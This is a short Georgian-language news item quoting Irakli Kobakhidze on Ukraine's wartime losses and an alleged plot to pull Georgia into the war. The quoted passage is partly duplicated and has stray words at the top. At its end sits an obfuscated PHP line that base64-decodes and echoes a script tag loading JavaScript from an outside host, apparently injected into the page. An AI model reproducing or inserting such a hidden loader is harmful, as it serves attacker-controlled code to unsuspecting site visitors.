celsiusi
ავერსი შნაიდერი
იმ ვითარებაში, როდესაც უკრაინაში ყოველი მესამე ადამიანი აღარ ცხოვრობს თავის საცხოვრებელ ადგილზე, ძალიან ადვილი შესაფასებელია, რა მძიმე ვითარებაა იქ. ეკონომიკური ვარდნა 45%-ია. ეს არის სრული ეკონომიკური კატასტროფა! მთლიანად დამძიმებულია ვითარება პოლიტიკური თვალსაზრისით. ეს არის ის შედეგები, რაც გვინდა ჩვენ საქართველოსთვის თავიდან ავიცილოთ, – ამის შესახებ პარტია „ქართული ოცნების“ თავმჯდომარემ, ირაკლი კობახიძემ „იმედის კვირასთან“ ინეტრვიუში განაცხადა.
 
„ამაზე იყო გათვლა, რომ სააკაშვილის ჩამოსვლით კიდევ უფრო დამძიმდებოდა საარჩევნო მდგომარეობა, უშუალოდ არჩევნების დღეს აირეოდა ვითარება. საბოლოო ჯამში, ამ ყველაფრის მიზანი იყო ხელისუფლების ცვლილება, გადატრიალება და ამის შემდეგ ძალიან მარტივად ჩაერთვებოდა ხელისუფლებაში მყოფი ომის პარტია, უკვე ხელისუფლებაში მყოფი იმ სამხედრო კონფლიქტში, რომელიც დღესა არის უკრაინაში გაჩაღებული. ეს იყო სცენარი.
 
შესაბამისად, არსი კოორდინაციის უმაღლესი ხარისხი და აქედან გამომდინარე, მაღალ დონეზეც კეთდება განცხადებები, რომელთა მიზანია, საქართველოს უკრაინაში მიმდინარე ომში ჩათრევა.
 
იმ ვითარებაში, როდესაც ყოველი მესამე ადამიანი აღარ ცხოვრობს თავის საცხოვრებელ ადგილზე, ძალიან ადვილი შესაფასებელია, რა მძიმე ვითარებაა იქ. ეკონომიკური ვარდნა 45%-ია. ეს არის სრული ეკონომიკური კატასტროფა! მთლიანად დამძიმებულია ვითარება პოლიტიკური თვალსაზრისით. ეს არის ის შედეგები, რაც გვინდა ჩვენ საქართველოსთვის თავიდან ავიცილოთ“, – განაცხადა კობახიძემ.
 
 
909
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");